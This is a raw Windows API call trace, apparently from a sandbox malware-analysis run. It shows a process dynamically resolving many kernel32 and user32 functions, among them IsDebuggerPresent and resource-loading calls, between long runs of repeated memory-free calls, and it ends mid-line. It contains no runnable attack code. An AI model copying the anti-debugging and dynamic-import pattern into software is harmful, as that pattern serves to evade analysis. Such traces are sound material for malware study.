[0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.420] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.421] GetCurrentProcessId () returned 0xfb0 [0241.446] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.447] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.448] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.449] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.450] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.451] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.452] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.453] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.454] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.455] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.456] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.458] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.459] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.460] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.461] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.462] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.463] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.464] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.465] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.466] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.467] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.468] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.469] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.470] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.472] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.473] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.474] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.474] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.475] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.476] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.477] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.478] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.479] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.480] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.481] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.482] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.482] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.483] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.620] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.621] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.621] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.622] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.623] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.624] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.625] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.904] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.922] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0241.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.923] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleW") returned 0x769c3460 [0241.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.923] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0241.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.924] GetProcAddress (hModule=0x769b0000, lpProcName="LoadResource") returned 0x769c5904 [0241.924] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.925] GetProcAddress (hModule=0x769b0000, lpProcName="LockResource") returned 0x769c5911 [0241.925] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.925] GetProcAddress (hModule=0x769b0000, lpProcName="SizeofResource") returned 0x769c5a81 [0241.925] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.926] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceW") returned 0x769c5929 [0241.926] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.927] GetProcAddress (hModule=0x769b0000, lpProcName="FreeConsole") returned 0x76a67070 [0241.927] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.927] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileW") returned 0x769c3f0c [0241.927] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.928] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSize") returned 0x77a13002 [0241.928] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.929] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessHeap") returned 0x769c14c9 [0241.929] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.929] GetProcAddress (hModule=0x769b0000, lpProcName="SetStdHandle") returned 0x76a44aef [0241.929] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.930] GetProcAddress (hModule=0x769b0000, lpProcName="SetEnvironmentVariableW") returned 0x769c89a9 [0241.930] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.931] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0241.931] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.931] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0241.931] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.932] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0241.932] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.933] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionEx") returned 0x769c4ce0 [0241.933] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.933] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0241.933] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.934] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0241.934] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.935] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0241.935] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.935] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0241.935] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.936] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0241.936] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.937] GetProcAddress (hModule=0x769b0000, lpProcName="GetStringTypeW") returned 0x769c1926 [0241.937] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.937] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0241.937] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.938] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0241.938] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.939] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0241.939] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.939] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0241.939] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.940] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTimeAsFileTime") returned 0x769c34b9 [0241.940] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.941] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeSListHead") returned 0x77a194a4 [0241.941] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.942] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0241.942] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.943] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0241.943] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.944] GetProcAddress (hModule=0x769b0000, lpProcName="SetUnhandledExceptionFilter") returned 0x769c8781 [0241.944] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.945] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoW") returned 0x769c4cf8 [0241.945] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.945] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0241.945] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.946] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0241.946] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.947] GetProcAddress (hModule=0x769b0000, lpProcName="TerminateProcess") returned 0x769dd7d2 [0241.947] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.947] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0241.947] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.948] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0241.948] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.949] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0241.949] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.949] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0241.949] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.950] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x769c18f6 [0241.950] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.951] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0241.951] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.951] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0241.951] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.952] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0241.953] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.954] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0241.954] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.954] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0241.955] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.955] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExW") returned 0x769c4915 [0241.955] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.956] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0241.956] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.957] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0241.957] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.957] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0241.957] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.958] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0241.958] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.959] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleExW") returned 0x769c4a27 [0241.959] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.959] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0241.959] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.960] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineW") returned 0x769c51db [0241.960] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.961] GetProcAddress (hModule=0x769b0000, lpProcName="HeapAlloc") returned 0x77a0e026 [0241.961] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.961] GetProcAddress (hModule=0x769b0000, lpProcName="HeapFree") returned 0x769c14a9 [0241.961] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.962] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringW") returned 0x769c3b7a [0241.962] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.962] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringW") returned 0x769c1799 [0241.962] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.963] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoW") returned 0x769c3bf2 [0241.963] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.964] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidLocale") returned 0x769dce1e [0241.964] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.964] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultLCID") returned 0x769c3d55 [0241.964] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.965] GetProcAddress (hModule=0x769b0000, lpProcName="EnumSystemLocalesW") returned 0x76a447ff [0241.965] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.966] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0241.966] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.966] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0241.966] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.967] GetProcAddress (hModule=0x769b0000, lpProcName="FlushFileBuffers") returned 0x769c4653 [0241.967] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.969] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleOutputCP") returned 0x769d9ae7 [0241.969] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.969] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleMode") returned 0x769c1328 [0241.969] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.970] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0241.970] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.971] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSizeEx") returned 0x769c599a [0241.971] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.971] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointerEx") returned 0x769dc7df [0241.971] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.972] GetProcAddress (hModule=0x769b0000, lpProcName="ReadConsoleW") returned 0x76a67962 [0241.972] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.973] GetProcAddress (hModule=0x769b0000, lpProcName="HeapReAlloc") returned 0x77a21f6e [0241.973] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.973] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0241.973] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.974] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileExW") returned 0x769d17c9 [0241.974] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.975] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileW") returned 0x769c54a6 [0241.975] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.975] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidCodePage") returned 0x769c444b [0241.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.976] GetProcAddress (hModule=0x769b0000, lpProcName="GetACP") returned 0x769c177c [0241.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.977] GetProcAddress (hModule=0x769b0000, lpProcName="GetOEMCP") returned 0x769ed191 [0241.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.977] GetProcAddress (hModule=0x769b0000, lpProcName="GetEnvironmentStringsW") returned 0x769c519b [0241.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.978] GetProcAddress (hModule=0x769b0000, lpProcName="FreeEnvironmentStringsW") returned 0x769c5183 [0241.978] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0241.979] GetProcAddress (hModule=0x769b0000, lpProcName="WriteConsoleW") returned 0x769e7a92 [0241.979] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0241.979] GetProcAddress (hModule=0x773b0000, lpProcName="SendNotifyMessageA") returned 0x77426d5d [0241.979] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0241.980] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0241.980] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0241.981] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBeep") returned 0x773dc036 [0241.981] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.981] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0241.981] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.982] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0241.982] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.983] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0241.983] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.983] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessAffinityMask") returned 0x769ca829 [0241.983] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.984] GetProcAddress (hModule=0x769b0000, lpProcName="SetProcessAffinityMask") returned 0x76a434dc [0241.984] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.985] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadAffinityMask") returned 0x769e0570 [0241.985] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.985] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0241.985] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.986] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0241.986] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.987] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0241.987] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.987] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0241.987] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.988] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0241.988] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0241.988] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0241.989] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0241.989] GetProcAddress (hModule=0x773b0000, lpProcName="GetProcessWindowStation") returned 0x773c9eea [0241.989] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0241.990] GetProcAddress (hModule=0x773b0000, lpProcName="GetUserObjectInformationW") returned 0x773c8068 [0241.990] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.991] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.992] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.993] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.994] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.995] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.996] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.997] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.998] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.999] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.000] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.001] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.002] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.003] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.003] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.004] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.005] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.006] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.007] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.008] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.009] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.010] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.011] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.012] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.013] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.014] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.016] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.017] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.018] VirtualFree 